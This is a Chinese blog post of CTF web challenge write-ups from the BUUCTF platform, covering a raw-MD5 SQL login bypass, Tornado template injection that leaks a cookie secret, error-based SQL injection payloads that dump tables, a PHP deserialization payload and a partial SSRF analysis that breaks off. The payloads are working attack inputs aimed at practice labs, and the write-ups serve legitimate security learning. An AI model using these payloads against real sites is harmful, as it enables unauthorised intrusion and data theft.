<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="[BJDCTF2020]Easy MD5知识点1.MD5加密  md5(passwrod,true)2.php弱类型匹配或数组绕过">
<meta property="og:type" content="article">
<meta property="og:title" content="buu">
<meta property="og:url" content="http://example.com/2023/07/13/buu/index.html">
<meta property="og:site_name" content="057lwq&#39;s Blog">
<meta property="og:description" content="[BJDCTF2020]Easy MD5知识点1.MD5加密  md5(passwrod,true)2.php弱类型匹配或数组绕过">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/buu/1-1.png">
<meta property="og:image" content="http://example.com/images/buu/1-2.png">
<meta property="og:image" content="http://example.com/images/buu/1-3.png">
<meta property="og:image" content="http://example.com/images/buu/1-4.png">
<meta property="og:image" content="http://example.com/images/buu/1-5.png">
<meta property="og:image" content="http://example.com/images/buu/1-6.png">
<meta property="og:image" content="http://example.com/images/buu/2-1.png">
<meta property="og:image" content="http://example.com/images/buu/2-2.png">
<meta property="og:image" content="http://example.com/images/buu/2-3.png">
<meta property="og:image" content="http://example.com/images/buu/2-4.png">
<meta property="og:image" content="http://example.com/images/buu/2-5.png">
<meta property="og:image" content="http://example.com/images/buu/2-6.png">
<meta property="og:image" content="http://example.com/images/buu/3-1.png">
<meta property="og:image" content="http://example.com/images/buu/3-2.png">
<meta property="og:image" content="http://example.com/images/buu/3-3.png">
<meta property="og:image" content="http://example.com/images/buu/4-1.png">
<meta property="og:image" content="http://example.com/images/buu/4-3.png">
<meta property="article:published_time" content="2023-07-13T02:31:07.000Z">
<meta property="article:modified_time" content="2023-07-25T05:30:53.067Z">
<meta property="article:author" content="lwq">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/buu/1-1.png">

<link rel="canonical" href="http://example.com/2023/07/13/buu/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>buu | 057lwq's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">057lwq's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/07/13/buu/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lwq">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="057lwq's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          buu
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-07-13 10:31:07" itemprop="dateCreated datePublished" datetime="2023-07-13T10:31:07+08:00">2023-07-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-07-25 13:30:53" itemprop="dateModified" datetime="2023-07-25T13:30:53+08:00">2023-07-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h1><p>知识点<br>1.MD5加密<br>  md5(passwrod,true)<br>2.php弱类型匹配或数组绕过</p>
<span id="more"></span>


<p>打开环境，只有一个文本框和提交按钮。<br>先随便输入一点东西提交。<br>发现url栏出现了password<br><img src="/images/buu/1-1.png" alt="1"><br>尝试sql注入，没有任何变化。<br>去查看源码，再文件头发现了提示<br><code>select * from &#39;admin&#39; where password=md5($pass,true)</code><br><img src="/images/buu/1-2.png" alt="1"><br>这里面password就是我们用户框中输入得东西。如果通过md5之后返回字符串是’or 1的话，形成一个永真条件.<br>这个可以用ffifdyop绕过，绕过原理是：<br>ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ‘ or ‘6<br>而 Mysql 刚好又会把 hex 转成 ascii 解释，因此拼接之后的形式是 select * from ‘admin’ where password&#x3D;’’ or ‘6xxxxx’，等价于 or 一个永真式，因此相当于万能密码，可以绕过md5()函数。<br>提交<code>password=ffifdyop</code>之后成功绕过，来到了另一个页面<br><img src="/images/buu/1-3.png" alt="1"><br>查看源码<br><img src="/images/buu/1-4.png" alt="1"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line">$a = $GET[&#x27;a&#x27;];</span><br><span class="line">$b = $_GET[&#x27;b&#x27;];</span><br><span class="line"></span><br><span class="line">if($a != $b &amp;&amp; md5($a) == md5($b))&#123;</span><br><span class="line">    // wow, glzjin wants a girl friend.</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>
<p>在这里我们就用md5无法处理数组，然后都返回null，null&#x3D;null然后就绕过了这个。<br>造payload：<code>?a[]=1&amp;b[]=2</code><br>成功绕过<br><img src="/images/buu/1-5.png" alt="1"><br>以 POST方式，传param1和param2两个参数，这两个参数不能相等，但是md5转换后的值要相等<br>原理同上<br><img src="/images/buu/1-6.png" alt="1"></p>
<h1 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h1><p>一道模板注入的题<br>打开环境，有三个txt文件<br><img src="/images/buu/2-1.png" alt="1"><br>&#x2F;flag.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag in /fllllllllllllag</span><br></pre></td></tr></table></figure>
<p>这个文件提示了flag在&#x2F;fllllllllllllag文件下<br>&#x2F;welcome.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/welcome.txt</span><br><span class="line">render</span><br></pre></td></tr></table></figure>
<p>查了一下rander函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rander 是python 的 tornado 模板的一个渲染函数，这个函数接收前端传来的参数，根据不同的参数显示不同的页面结果，如果后端代码不严谨，客户端可以传入一些参数或者简单的表达式来查看环境变量或执行一些指令</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://tornado-zh.readthedocs.io/zh/latest/">tornado框架的介绍</a></p>
<p>&#x2F;hints.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename))</span><br></pre></td></tr></table></figure>
<p>这个文件说明要将 cookie_secret 与 filename拼接，再进行md5加密，得到filehash，与&#x2F;fllllllllllllag结合找到flag.</p>
<p>并且可以观察到三个文件的url都是由filename和filehash组成。filehash即为他们filename的md5值。</p>
<p>更改url栏的filename和filehash发现跳转到error页面<br><img src="/images/buu/2-2.png" alt="1"><br>更改msg的值，发现页面的提示也发生改变<br><img src="/images/buu/2-3.png" alt="1"></p>
<p>了解了tornado框架后知道cookie_sercet 放在了 application对象的 settings 属性中；又因为 handler 指向 处理当前页面的 RequestHandler 对象，RequestHandler.settings 指向 self.application.settings, 所以 handler.settings 就指向了 RquestHandler.appliaction.settings;</p>
<p>构造payload:<br><code>/error?msg=&#123;&#123;handler.settings&#125;&#125;</code><br><img src="/images/buu/2-4.png" alt="1"></p>
<p>得到 cookie_secret，写一个python 脚本，将 cookie_secret 与 filename拼接，加密，得到filehash:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">import hashlib</span><br><span class="line"></span><br><span class="line">filename = &quot;/fllllllllllllag&quot;</span><br><span class="line"></span><br><span class="line">cookie_secret = &#x27;ad0f9b72-1898-4558-a137-7891e83aaeca&#x27;</span><br><span class="line"></span><br><span class="line">def md5(s):</span><br><span class="line">    md5 = hashlib.md5()</span><br><span class="line">    md5.update(s.encode(encoding=&#x27;utf-8&#x27;))</span><br><span class="line">    return md5.hexdigest()</span><br><span class="line"></span><br><span class="line">print(md5(cookie_secret+md5(filename)))</span><br></pre></td></tr></table></figure>
<p><img src="/images/buu/2-5.png" alt="1"><br><img src="/images/buu/2-6.png" alt="1"></p>
<h1 id="HCTF-2018-admin-1"><a href="#HCTF-2018-admin-1" class="headerlink" title="[HCTF 2018]admin 1"></a>[HCTF 2018]admin 1</h1><p>打开后页面上没什么东西，右上角可以注册和登录。<br>发现提示你不是管理员，可能后面要想办法获取管理员权限<br><img src="/images/buu/3-1.png" alt="1"><br>再去查看注册和登录界面的源码，没发现什么，那就先随便注册个账号登录看看。<br>登录后多了post和改密码界面，再一一查看源码。<br><img src="/images/buu/3-2.png" alt="1"><br>在修改密码的源码发现了一个网址<br><img src="/images/buu/3-3.png" alt="1"><br>我做的时候这个源码地址失效了，打不开，不想折腾了，直接上<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44677409/article/details/100733581">链接</a></p>
<h1 id="极客大挑战-2019-HardSQL"><a href="#极客大挑战-2019-HardSQL" class="headerlink" title="[极客大挑战 2019]HardSQL"></a>[极客大挑战 2019]HardSQL</h1><p>打开环境，知道是sql注入，就先进行常规尝试，发现许多字符以及空格等都被过滤了，尝试&#x2F;**&#x2F;绕过空格也不行。<br>尝试用()括号来绕过空格，成功了，这里简单讲下空格绕过的原理：<br><code>括号是来包含子查询的，任何可以计算出结果的语句都可以用括号围起来，而括号的两端，可以没有多余的空格</code><br>union被过滤了，所以尝试一下报错注入<br><code>?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&amp;password=123</code><br>得到数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27;or(extractvalue(1,concat(0x7e,(select(database()))))) //获得数据库名</span><br><span class="line"></span><br><span class="line">admin&#x27;or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables where(table_schema)like(database())))))%23  //获得数据表名</span><br><span class="line"></span><br><span class="line">admin&#x27;or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(&#x27;H4rDsq1&#x27;)))))%23   //获得字段名</span><br><span class="line"></span><br><span class="line">admin&#x27;or(extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1)))))%23  //查询flag，只显示出一部分</span><br><span class="line"></span><br><span class="line">admin&#x27;or(extractvalue(1,concat(0x7e,(select(right(password,20))from(geek.H4rDsq1)))))%23    //查询flag右边20个字符</span><br></pre></td></tr></table></figure>

<h1 id="网鼎杯-2020-青龙组-AreUSerialz"><a href="#网鼎杯-2020-青龙组-AreUSerialz" class="headerlink" title="[网鼎杯 2020 青龙组]AreUSerialz"></a>[网鼎杯 2020 青龙组]AreUSerialz</h1><p>打开环境，是一道代码审计的反序列化的题。<br>先进行代码审计<br>先分析输入部分</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">function is_valid($s) </span><br><span class="line">&#123;</span><br><span class="line">    for($i = 0; $i &lt; strlen($s); $i++) //限制字符串范围</span><br><span class="line">        if(!(ord($s[$i]) &gt;= 32 &amp;&amp; ord($s[$i]) &lt;= 125))</span><br><span class="line">            return false;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET&#123;&#x27;str&#x27;&#125;)) </span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    $str = (string)$_GET[&#x27;str&#x27;];</span><br><span class="line">    if(is_valid($str)) &#123;</span><br><span class="line">        $obj = unserialize($str);//反序列化</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>is_valid()函数对传入的字符串进行判断，确保每一个字符ASCII码值都在32-125，即该函数的作用是确保参数字符串的每一个字符都是可打印的，才返回true。</p>
<p>再分析类中的部分。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">class FileHandler &#123;</span><br><span class="line"></span><br><span class="line">    protected $op;</span><br><span class="line">    protected $filename;</span><br><span class="line">    protected $content;</span><br><span class="line"></span><br><span class="line">    function __construct() //调用函数时触发，这题用不到</span><br><span class="line">	&#123;</span><br><span class="line">        $op = &quot;1&quot;;</span><br><span class="line">        $filename = &quot;/tmp/tmpfile&quot;;</span><br><span class="line">        $content = &quot;Hello World!&quot;;</span><br><span class="line">        $this-&gt;process();</span><br><span class="line">   	 &#125;</span><br><span class="line"></span><br><span class="line">    public function process() //需要令op的值等于2以执行文件读取</span><br><span class="line">   &#123;</span><br><span class="line">        if($this-&gt;op == &quot;1&quot;) </span><br><span class="line">	&#123;</span><br><span class="line">            $this-&gt;write();</span><br><span class="line">        &#125; else if($this-&gt;op == &quot;2&quot;) //弱类型比较</span><br><span class="line">	&#123;</span><br><span class="line">            $res = $this-&gt;read();   //读文件</span><br><span class="line">            $this-&gt;output($res);    //输出文件，</span><br><span class="line">        &#125; else </span><br><span class="line">	&#123;</span><br><span class="line">            $this-&gt;output(&quot;Bad Hacker!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function write() </span><br><span class="line">&#123;</span><br><span class="line">        if(isset($this-&gt;filename) &amp;&amp; isset($this-&gt;content)) </span><br><span class="line">	&#123;</span><br><span class="line">            if(strlen((string)$this-&gt;content) &gt; 100) </span><br><span class="line">		&#123;</span><br><span class="line">                $this-&gt;output(&quot;Too long!&quot;);</span><br><span class="line">                die();</span><br><span class="line">            	&#125;</span><br><span class="line">            $res = file_put_contents($this-&gt;filename, $this-&gt;content);</span><br><span class="line">            if($res) $this-&gt;output(&quot;Successful!&quot;);</span><br><span class="line">            else $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125; else </span><br><span class="line">	&#123;</span><br><span class="line">            $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    private function read() //令filename等于flag.php，就可以直接读取</span><br><span class="line">	&#123;</span><br><span class="line">        $res = &quot;&quot;;</span><br><span class="line">        if(isset($this-&gt;filename)) </span><br><span class="line">	&#123;</span><br><span class="line">            $res = file_get_contents($this-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">        return $res;//返回flag.php，process()可以调用来输出</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function output($s) //输出函数</span><br><span class="line">	&#123;</span><br><span class="line">        echo &quot;[Result]: &lt;br&gt;&quot;;</span><br><span class="line">        echo $s;</span><br><span class="line">    	&#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() </span><br><span class="line">	&#123;</span><br><span class="line">        if($this-&gt;op === &quot;2&quot;)//对op的值进行强判断</span><br><span class="line">            $this-&gt;op = &quot;1&quot;;</span><br><span class="line">        $this-&gt;content = &quot;&quot;;</span><br><span class="line">        $this-&gt;process();</span><br><span class="line">   	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>查看网页源代码，可以看到有不可打印字符。这是因为序列化后protected类型的属性存在不可打印字符。（经测试，private类型的属性序列化后也产生不可打印字符）对于PHP版本7.1+，对属性的类型不敏感，我们可以将protected类型改为public，以消除不可打印字符<br>本地序列化操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> </span><br><span class="line">class FileHandler &#123;</span><br><span class="line"> </span><br><span class="line">    public  $op = 2;</span><br><span class="line">    public  $filename = &quot;flag.php&quot;;</span><br><span class="line">    public  $content = &quot;1&quot;;        //因为destruce函数会将content改为空，所以content的值随意（但是要满足is_valid()函数的要求）</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">$a = new FileHandler();</span><br><span class="line">$b = serialize($a);</span><br><span class="line">echo $b;</span><br><span class="line"> </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p><code>O:11:&quot;FileHandler&quot;:3:&#123;s:2:&quot;op&quot;;i:2;s:8:&quot;filename&quot;;s:8:&quot;flag.php&quot;;s:7:&quot;content&quot;;s:1:&quot;1&quot;;&#125;</code><br>payload<br><code>?str=O:11:&quot;FileHandler&quot;:3:&#123;s:2:&quot;op&quot;;i:2;s:8:&quot;filename&quot;;s:8:&quot;flag.php&quot;;s:7:&quot;content&quot;;s:1:&quot;1&quot;;&#125;</code><br>查看源代码拿到flag</p>
<h1 id="网鼎杯-2018-Fakebook"><a href="#网鼎杯-2018-Fakebook" class="headerlink" title="[网鼎杯 2018]Fakebook"></a>[网鼎杯 2018]Fakebook</h1><p>扫描目录，发现robot.txt,访问一下发现user.php.bak<br>下载下来<br>代码审计</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class UserInfo</span><br><span class="line">&#123;</span><br><span class="line">    public $name = &quot;&quot;;</span><br><span class="line">    public $age = 0;</span><br><span class="line">    public $blog = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">    public function __construct($name, $age, $blog)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;name = $name;</span><br><span class="line">        $this-&gt;age = (int)$age;</span><br><span class="line">        $this-&gt;blog = $blog;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function get($url)</span><br><span class="line">    &#123;</span><br><span class="line">        $ch = curl_init();</span><br><span class="line"></span><br><span class="line">        curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">        $output = curl_exec($ch);</span><br><span class="line">        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);</span><br><span class="line">        if($httpCode == 404) &#123;</span><br><span class="line">            return 404;</span><br><span class="line">        &#125;</span><br><span class="line">        curl_close($ch);</span><br><span class="line"></span><br><span class="line">        return $output;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function getBlogContents ()</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;get($this-&gt;blog);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function isValidBlog ()</span><br><span class="line">    &#123;</span><br><span class="line">        $blog = $this-&gt;blog;</span><br><span class="line">        return preg_match(&quot;/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i&quot;, $blog);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">function get($url)</span><br><span class="line">    &#123;</span><br><span class="line">        $ch = curl_init();</span><br><span class="line"></span><br><span class="line">        curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">        $output = curl_exec($ch);</span><br><span class="line">        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);</span><br><span class="line">        if($httpCode == 404) &#123;</span><br><span class="line">            return 404;</span><br><span class="line">        &#125;</span><br><span class="line">        curl_close($ch);</span><br><span class="line"></span><br><span class="line">        return $output;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>curl_init ： 初始化一个cURL会话，供curl_setopt(), curl_exec()和curl_close() 函数使用。</p>
<p>curl_setopt ： 请求一个url。其中CURLOPT_URL表示需要获取的URL地址，后面就是跟上了它的值。</p>
<p>CURLOPT_RETURNTRANSFER 将curl_exec()获取的信息以文件流的形式返回，而不是直接输出。</p>
<p>curl_exec，成功时返回 TRUE， 或者在失败时返回 FALSE。 然而，如果 CURLOPT_RETURNTRANSFER选项被设置，函数执行成功时会返回执行的结果，失败时返回 FALSE 。</p>
<p>CURLINFO_HTTP_CODE ：最后一个收到的HTTP代码。<br>curl_getinfo：以字符串形式返回它的值，因为设置了CURLINFO_HTTP_CODE，所以是返回的状态码。如果状态码不是404，就返回exec的结果。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function isValidBlog ()</span><br><span class="line">  &#123;</span><br><span class="line">      $blog = $this-&gt;blog;</span><br><span class="line">      return preg_match(&quot;/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i&quot;, $blog);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>
<p>调用get函数，传参blog</p>
<p>差不多知道咋回事了，就是反序列化+ssrf。<br>我们注册后，把我们的信息序列化一下，然后存进data。在user界面，取出blog，获取资源。</p>
<p>注册一个账号，发现?no存在注入</p>
